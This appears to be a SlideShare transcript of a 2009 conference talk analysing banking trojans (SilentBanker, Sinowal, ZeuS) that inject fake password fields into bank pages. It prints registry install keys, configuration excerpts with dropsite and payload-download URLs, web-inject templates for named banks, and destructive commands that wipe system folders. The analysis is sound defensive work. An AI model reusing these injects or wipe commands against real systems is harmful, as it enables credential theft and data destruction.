SlideShare a Scribd company logo

Common Browser Hijacking Methods

David Barroso
David Barroso

Presentación realizada en el evento de Terena de mayo de 2009

Technology
1 of 43
*[ Common Browser Hijacking Methods] David Barroso TERENA Meeting, León
Agenda Browser Hijacking Examples: SilentBanker, Sinowal, Wnspoem Kill the Operating System Summary 2
Browser Hijacking
Definition “Browser hijacking is the modification of a web browser’s settings by malicious code. The term ‘hijacking’ is used as the changes are performed without the user’s permission” (Wikipedia) Additionally, the malicious code can modify the HTML rendered in the browser in order to lure the user 4
Why are they asking for so many data? 5
Examples
SilentBanker Date: 2007 Method: Browser Helper Object Technique: Real time HTML injection and HTML forwarding Infection: drive-by exploits Misc: more than 75 mutations 7
SilentBanker: Flow Diagram 8
SilentBanker: BHO Installation [HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}] @="Microsoft Shared Library Object Version" [HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}InprocServer32] @="C:WINDOWSsystem32mfc42dx1.dll" "ThreadingModel"="Apartment" [HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}ProgID] @="SharedObject.SharedObjectVersion.1" [HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}TypeLib] @="{5F226421-415D-408D-9A09-0DCD94E25B48}" [HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}VersionIndependentProgID] @="SharedObject.SharedObjectVersion" [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects {0000AC13-3487-1583-C4BE-BE6A839DB000}] 9
SilentBanker: Configuration File Get X.Y.67.30/~ipcount/ww6/getcfg.php? id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=6&z=12705442 10
SilentBanker: Configuration File The encrypted configuration file includes: [dfgdf] • Additional configuration sources Bg1=X.Y.67.30/~ipcount/ww6/getcfg.php • Dropsite URL Bg2=A.B.100.103/ww6/getcfg.php • Update URL • Data encryption key [nbmx] Bg1=X.Y.67.30/~ipcount/ww6/data.php Bg2=A.B.100.103/ww6/data.php [kjew] Bg1=X.Y.67.30/~ipcount/ww6/file.exe Bg2=A.B.100.103/ww6/file.exe [sdfs] secd=08000000B7B613F1F56F5BC7EDAEDEEFD2ABB1D38B2BA1014A585… 11
SilentBanker: Injection Configuration Get X.Y.67.30/~ipcount/ww6/getcfg.php? Action pok id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442 qas Target URL njd Begin replacement token dfr Number of characters in njd -1 xzn End replacement token [jhw18] xzq Number of characters in xzn -1 pok=insert rek HTML code injected qas=passport.yandex.ru/passport req Number of characters in rek -1 njd=3ECFE0F0EEEBFC3A3C28 dfr=9 insert insert injected HTML code between tokens xzn=3C2367653E69 delete delete HTML code in xzn xzq=5 replace replace HTML code in xzn rek=202020203C676520696E797674612122676263223E0D0A202020203223ECFE subreq substitute xzn with rek BE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206 grab extract field in xzn A767167752122292431222070796E666621227661636867223E0D0A202020203C 766163686720676C63722122636E66666A6265712220616E7A722122636E66666… req=331 12
SilentBanker: Injection Configuration <ge inyvta!"gbc"> <gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq> <gq jvqgu!"%+1" pynff!"ynory">Ïëàòåæíûé ïàðîëü:<#gq> <gq jvqgu!")$1" pynff!"vachg"> <vachg glcr!"cnffjbeq" anzr!"cnffjq&" inyhr!"" fglyr!"jvqgu:)$1" gnovaqrk!"&">2aofc;2aofc;<oe#> <#gq> <gq jvqgu!"&)1"><oe><#gq> <#ge> ROT-13 Algorithm <tr valign="top"> <td width="8%"><div style="width: 40px;"><br /></div></td> <td width="17%" class="label">Ïëàòåæíûé ïàðîëü:</td> <td width="50%" class="input"> <input type="password" name="passwd2" value="" style="width:50%" tabindex="2 &nbsp;&nbsp;<br/> </td> <td width="25%"><br></td> </tr> 13
SilentBanker: Original Webpage 14
SilentBanker: Modified Webpage 15
Sinowal/Anserin/Torpig Date: 2005 Method: Code Injection Technique: Real time HTML injection and HTML forwarding Infection: drive-by exploits and email Misc: infects Master Boot Record (MBR) to be stealth 16
Sinowal: Injection Sinowal does not have a configuration file with details about all the injections Each time the user connects to a specific sites, Sinowal asks its injection server for instructions 17
Sinowal: Injection Example GET host/Key/EncryptedData GET host/EFAAC5AEB85FF1D1/ MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1 I want the answer Tell me the fake This is the targeted encrypted page path brand 18
Sinowal: Injection Example Step 3: The injection server looks for the targeted brand: UK online*.lloydstsb.* /miheld.ibc {www} /uk/lloyds/lloyds.php 204 USA onlineid.bankofamerica.com /cgi- bin/sso.login.controller* {www} /usa/bofa_pers/sso.login.php 2 0 3 ES www*.bancopopular.es /Bpemotor {www} /spain/bancopopular/bancopopular.php 2 0 2 19
Sinowal: Injection Example 2: You need a GET of to enabled 5: number 0: Number1: Injection of visits This is the fake page injection attempts the real URL Step 4: the injection server answers path www*.bancopopular.es /Bpemotor /spain/bancopopular/bancopopular.php 2 0 5 1 20
Sinowal: Targeted URLs HTTP Forwarding • PL: 7 (Web Injects) • AU: 26 • UK: 40 • SK: 5 • DE: 47 • NZ: 8 • US: 65 • NL: 4 • ES: 30 • SG: 2 • IT: 18 • AT: 7 • TR: 44 21
Wnspoem/PRG/ZeuS/Ntos Date: 2006 Method: Code Injection Technique: Real time HTML injection and HTML forwarding Infection: drive-by exploits Version 1 Version 2 Version 3 Version 4 Directory wnspoem sysproc64 twain_32 lowsec Filename ntos.exe oembios.exe twext.exe sdra64.exe Stolen data audio.dll sysproc86.sys local.ds local.ds Configuratio video.dll sysproc32.sys user.ds user.ds n 22
Wnspoem: Famous Screenshots 23
Wnspoem: Flow Diagram 24
Wnspoem: Hooks Wsock32.dll (FTP/POP3 capture) Wininet.dll (Capture data, inject • Send HTML) • Sendto • HTTPSendRequest • Closesocket • InternetReadFile Ws2_32.dll (FTP/POP3) • InternetReadFileEx • Send • InternetQueryDataAvailable • Sendto • InternetCloseHandle • WSASend • HTTPQueryInfo • WSASendTo Ntdll.dll (Infect processes and hide • Closesocket files) User32.dll (Keylogger) • NtCreateThread • GetMessage • LdrLoadDll • PeekMesasge • LdrGetProcedureAddress • GetClipboardData • NtQueryDirectoryFile Crypt32.dll (Certificates) • PFXImportCertStore 25
Wnspoem: Configuration File Configuration files in latest wnspoem version uses RC4 and 256-bits keys set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP data_before name="password"*</td>*</td> data_end data_inject <td align="left" colspan="7" valign="bottom"></td></tr><tr> <td class="textoHome" align="left">3. Clave de Transferencias</td> <td width="20"><img src='/img4bog/px.gif' border='0' width="20" height="1"></td> <td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3 " class="TextoContenido"></td> data_end data_after data_end 26
Wnspoem: Original Webpage 27
Wnspoem: Modified Webpage 28
Wnspoem: HTTP Forwarding Some banks use security tokens or more complex 2nd authentication than a password In this scenario, HTML injection is avoided, and the user is forwarded to a fake webpage usually hosted in a compromised site 29
Wnspoem: HTTP Forwarding In the configuration file: @https://*.barclays.co.uk/* https://*.barclays.co.uk/* http://compromisedhost.com/img/commons/barclay/index.ph p @https://*.cajasur.es/* https://*.cajasur.es/* http://compromisedhost.com/img/commons/cajasur/index.ph p 30
Wnspoem: Fake Webpage 31
Wnspoem: Statistics Analysis and Statistics: Configuration files 750 configuration files (usually cfg.bin) analyzed. Only wnspoem version 1, 2 and 3 32
Wnspoem: Top 10 TLD 33
Wnspoem: Targeted Brands 34
Wnspoem: Malicious Domains 35
Wnspoem: Malicious IP Addresses 36
Kill the Operating System
Kill the Operating System It is getting more common that just after stealing the credentials, the operating system is remotely destroyed This action makes the analysis more difficult, since cannot be done remotely. The malicious code is not securely deleted in the system and can be recovered One optimistic result is that the machine will be reformated with a new and patched operating system. 38
Kill the Operating System Nethell: • Deletes NTDETECT.COM and ntldr InfoStealer: • Deletes drivers*.sys • Deletes some registry keys (HKLMMicrosoftWindows NTCurrentVersionWinlogon: Shell = Explorer.exe Wnspoem: • Deletes HKCU, HKLMSoftware and HKLMSystem Glacial Dracon: • del /A:S /Q /F C:*.* • del /S /Q %SYSTEMROOT% %PROGRAMFILES% 39
Summary
Summary Browser Hijacking is actively used in fraud schemes Targeted brands are all around the world Currently, only Microsoft Windows users are affected (Internet Explorer and Firefox) Be suspicious if your browser is asking for too much information Be more suspicious if your computer stops working just after your browsing is asking for too much information ☺ 41
Thanks David Barroso S21sec e-crime Director dbarroso@s21sec.com http://blog.s21sec.com lostinsecurity
*[ MUCHAS GRACIAS ] Pág. 43

Recommended

02 banking trojans-thomassiebert
02 banking trojans-thomassiebert02 banking trojans-thomassiebert
02 banking trojans-thomassiebertgeeksec80
 
Reutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiReutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiDefconRussia
 
Mobile Bitcoin Wallet Security - Andras Mendik
Mobile Bitcoin Wallet Security - Andras MendikMobile Bitcoin Wallet Security - Andras Mendik
Mobile Bitcoin Wallet Security - Andras MendikBitcoin Barcamp
 
The slower the stronger a story of password hash migration
The slower the stronger a story of password hash migrationThe slower the stronger a story of password hash migration
The slower the stronger a story of password hash migrationOWASP
 
SSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoSSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoTiago Cruz
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden TicketGiuseppe Trotta
 
Who moved my pixels?!
Who moved my pixels?!Who moved my pixels?!
Who moved my pixels?!Mikhail Sosonkin
 
Python Cryptography & Security
Python Cryptography & SecurityPython Cryptography & Security
Python Cryptography & SecurityJose Manuel Ortega Candel
 

Recommended

02 banking trojans-thomassiebert
02 banking trojans-thomassiebert02 banking trojans-thomassiebert
02 banking trojans-thomassiebertgeeksec80
 
Reutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiReutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiDefconRussia
 
Mobile Bitcoin Wallet Security - Andras Mendik
Mobile Bitcoin Wallet Security - Andras MendikMobile Bitcoin Wallet Security - Andras Mendik
Mobile Bitcoin Wallet Security - Andras MendikBitcoin Barcamp
 
The slower the stronger a story of password hash migration
The slower the stronger a story of password hash migrationThe slower the stronger a story of password hash migration
The slower the stronger a story of password hash migrationOWASP
 
SSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoSSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoTiago Cruz
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden TicketGiuseppe Trotta
 
Who moved my pixels?!
Who moved my pixels?!Who moved my pixels?!
Who moved my pixels?!Mikhail Sosonkin
 
Python Cryptography & Security
Python Cryptography & SecurityPython Cryptography & Security
Python Cryptography & SecurityJose Manuel Ortega Candel
 
Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsPriyanka Aash
 
Securing the Web without site-specific passwords
Securing the Web without site-specific passwordsSecuring the Web without site-specific passwords
Securing the Web without site-specific passwordsFrancois Marier
 
Authorization with oAuth
Authorization with oAuthAuthorization with oAuth
Authorization with oAuthVivastream
 
Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015GregMefford
 
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...Felipe Prado
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentNahidul Kibria
 
Fail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux osFail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux osSamina Fu (Shan Jung Fu)
 
Protocol buffers and Microservices
Protocol buffers and MicroservicesProtocol buffers and Microservices
Protocol buffers and MicroservicesVladimir Dejanovic
 
Php Security
Php SecurityPhp Security
Php Securityricardophp
 
Hospital management
Hospital managementHospital management
Hospital managementNaman Maheshwari
 
The bitcoin blockchain
The bitcoin blockchainThe bitcoin blockchain
The bitcoin blockchainSalah Hawila
 
Nginx+tomcat https 配置
Nginx+tomcat https 配置Nginx+tomcat https 配置
Nginx+tomcat https 配置诸葛修车网-诸葛商城
 
Угадываем пароль за минуту
Угадываем пароль за минутуУгадываем пароль за минуту
Угадываем пароль за минутуPositive Hack Days
 
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Alex Matrosov
 
SSH I/O Streaming via Redis-based Persistent Message Queue -Mani Tadayon
SSH I/O Streaming via Redis-based Persistent Message Queue -Mani Tadayon SSH I/O Streaming via Redis-based Persistent Message Queue -Mani Tadayon
SSH I/O Streaming via Redis-based Persistent Message Queue -Mani TadayonRedis Labs
 
Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...
Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...
Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...Luciano Mammino
 
Observability tips for HAProxy
Observability tips for HAProxyObservability tips for HAProxy
Observability tips for HAProxyWilly Tarreau
 
Security Vulnerabilities: How to Defend Against Them
Security Vulnerabilities: How to Defend Against ThemSecurity Vulnerabilities: How to Defend Against Them
Security Vulnerabilities: How to Defend Against ThemMartin Vigo
 
Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...
Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...
Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...DefconRussia
 
Taming botnets
Taming botnetsTaming botnets
Taming botnetsf00d
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisPositive Hack Days
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...Felipe Prado
 

More Related Content

What's hot

Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsPriyanka Aash
 
Securing the Web without site-specific passwords
Securing the Web without site-specific passwordsSecuring the Web without site-specific passwords
Securing the Web without site-specific passwordsFrancois Marier
 
Authorization with oAuth
Authorization with oAuthAuthorization with oAuth
Authorization with oAuthVivastream
 
Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015GregMefford
 
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...Felipe Prado
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentNahidul Kibria
 
Fail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux osFail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux osSamina Fu (Shan Jung Fu)
 
Protocol buffers and Microservices
Protocol buffers and MicroservicesProtocol buffers and Microservices
Protocol buffers and MicroservicesVladimir Dejanovic
 
The bitcoin blockchain
The bitcoin blockchainThe bitcoin blockchain
The bitcoin blockchainSalah Hawila
 
Угадываем пароль за минуту
Угадываем пароль за минутуУгадываем пароль за минуту
Угадываем пароль за минутуPositive Hack Days
 
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Alex Matrosov
 
SSH I/O Streaming via Redis-based Persistent Message Queue -Mani Tadayon
SSH I/O Streaming via Redis-based Persistent Message Queue -Mani Tadayon SSH I/O Streaming via Redis-based Persistent Message Queue -Mani Tadayon
SSH I/O Streaming via Redis-based Persistent Message Queue -Mani TadayonRedis Labs
 
Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...
Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...
Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...Luciano Mammino
 
Observability tips for HAProxy
Observability tips for HAProxyObservability tips for HAProxy
Observability tips for HAProxyWilly Tarreau
 

What's hot (17)

Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the Shadows
 
Securing the Web without site-specific passwords
Securing the Web without site-specific passwordsSecuring the Web without site-specific passwords
Securing the Web without site-specific passwords
 
Authorization with oAuth
Authorization with oAuthAuthorization with oAuth
Authorization with oAuth
 
Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015
 
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
 
Fail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux osFail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux os
 
Protocol buffers and Microservices
Protocol buffers and MicroservicesProtocol buffers and Microservices
Protocol buffers and Microservices
 
Php Security
Php SecurityPhp Security
Php Security
 
Hospital management
Hospital managementHospital management
Hospital management
 
The bitcoin blockchain
The bitcoin blockchainThe bitcoin blockchain
The bitcoin blockchain
 
Nginx+tomcat https 配置
Nginx+tomcat https 配置Nginx+tomcat https 配置
Nginx+tomcat https 配置
 
Угадываем пароль за минуту
Угадываем пароль за минутуУгадываем пароль за минуту
Угадываем пароль за минуту
 
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
 
SSH I/O Streaming via Redis-based Persistent Message Queue -Mani Tadayon
SSH I/O Streaming via Redis-based Persistent Message Queue -Mani Tadayon SSH I/O Streaming via Redis-based Persistent Message Queue -Mani Tadayon
SSH I/O Streaming via Redis-based Persistent Message Queue -Mani Tadayon
 
Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...
Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...
Cracking JWT tokens: a tale of magic, Node.js and parallel computing - WebReb...
 
Observability tips for HAProxy
Observability tips for HAProxyObservability tips for HAProxy
Observability tips for HAProxy
 

Similar to Common Browser Hijacking Methods

Security Vulnerabilities: How to Defend Against Them
Security Vulnerabilities: How to Defend Against ThemSecurity Vulnerabilities: How to Defend Against Them
Security Vulnerabilities: How to Defend Against ThemMartin Vigo
 
Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...
Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...
Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...DefconRussia
 
Taming botnets
Taming botnetsTaming botnets
Taming botnetsf00d
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisPositive Hack Days
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...Felipe Prado
 
Wireless Hotspot: The Hackers Playground
Wireless Hotspot: The Hackers PlaygroundWireless Hotspot: The Hackers Playground
Wireless Hotspot: The Hackers PlaygroundJim Geovedi
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
“Technical Intro to Blockhain” by Yurijs Pimenovs from Paybis at CryptoCurren...
“Technical Intro to Blockhain” by Yurijs Pimenovs from Paybis at CryptoCurren...“Technical Intro to Blockhain” by Yurijs Pimenovs from Paybis at CryptoCurren...
“Technical Intro to Blockhain” by Yurijs Pimenovs from Paybis at CryptoCurren...Dace Barone
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portalsmsobiegraj
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2ShapeBlue
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Stephan Chenette
 
Analyzing the Performance of Mobile Web
Analyzing the Performance of Mobile WebAnalyzing the Performance of Mobile Web
Analyzing the Performance of Mobile WebAriya Hidayat
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Development User Group
 
Hitcon badge 2018
Hitcon badge 2018 Hitcon badge 2018
Hitcon badge 2018 Alan Lee
 
Hack any website
Hack any websiteHack any website
Hack any websitesunil kumar
 

Similar to Common Browser Hijacking Methods (20)

Security Vulnerabilities: How to Defend Against Them
Security Vulnerabilities: How to Defend Against ThemSecurity Vulnerabilities: How to Defend Against Them
Security Vulnerabilities: How to Defend Against Them
 
Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...
Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...
Yarochkin, kropotov, chetvertakov tracking surreptitious malware distributi...
 
Taming botnets
Taming botnetsTaming botnets
Taming botnets
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
 
Wireless Hotspot: The Hackers Playground
Wireless Hotspot: The Hackers PlaygroundWireless Hotspot: The Hackers Playground
Wireless Hotspot: The Hackers Playground
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
“Technical Intro to Blockhain” by Yurijs Pimenovs from Paybis at CryptoCurren...
“Technical Intro to Blockhain” by Yurijs Pimenovs from Paybis at CryptoCurren...“Technical Intro to Blockhain” by Yurijs Pimenovs from Paybis at CryptoCurren...
“Technical Intro to Blockhain” by Yurijs Pimenovs from Paybis at CryptoCurren...
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
 
Analyzing the Performance of Mobile Web
Analyzing the Performance of Mobile WebAnalyzing the Performance of Mobile Web
Analyzing the Performance of Mobile Web
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
Hitcon badge 2018
Hitcon badge 2018 Hitcon badge 2018
Hitcon badge 2018
 
Hack any website
Hack any websiteHack any website
Hack any website
 
ql.io at NodePDX
ql.io at NodePDXql.io at NodePDX
ql.io at NodePDX
 

More from David Barroso

El replanteamiento de la ciberseguridad
El replanteamiento de la ciberseguridadEl replanteamiento de la ciberseguridad
El replanteamiento de la ciberseguridadDavid Barroso
 
OPSEC - Amanece que no es poco
OPSEC - Amanece que no es pocoOPSEC - Amanece que no es poco
OPSEC - Amanece que no es pocoDavid Barroso
 
Infección en BIOS, UEFI y derivados
Infección en BIOS, UEFI y derivadosInfección en BIOS, UEFI y derivados
Infección en BIOS, UEFI y derivadosDavid Barroso
 
En la época post-Snowden, ¿es la seguridad importante?
En la época post-Snowden, ¿es la seguridad importante?En la época post-Snowden, ¿es la seguridad importante?
En la época post-Snowden, ¿es la seguridad importante?David Barroso
 
Ataques dirigidos contra activistas
Ataques dirigidos contra activistasAtaques dirigidos contra activistas
Ataques dirigidos contra activistasDavid Barroso
 
Un gentil viaje al interior de las extorsiones mediante DDoS
Un gentil viaje al interior de las extorsiones mediante DDoSUn gentil viaje al interior de las extorsiones mediante DDoS
Un gentil viaje al interior de las extorsiones mediante DDoSDavid Barroso
 
Yersinia - Demostraciones prácticas de nuevos ataques de nivel dos
Yersinia - Demostraciones prácticas de nuevos ataques de nivel dosYersinia - Demostraciones prácticas de nuevos ataques de nivel dos
Yersinia - Demostraciones prácticas de nuevos ataques de nivel dosDavid Barroso
 
Recursos de la economía sumergida
Recursos de la economía sumergidaRecursos de la economía sumergida
Recursos de la economía sumergidaDavid Barroso
 
Extorsiones mediante DDoS
Extorsiones mediante DDoSExtorsiones mediante DDoS
Extorsiones mediante DDoSDavid Barroso
 
Respuesta ágil ante incidentes
Respuesta ágil ante incidentesRespuesta ágil ante incidentes
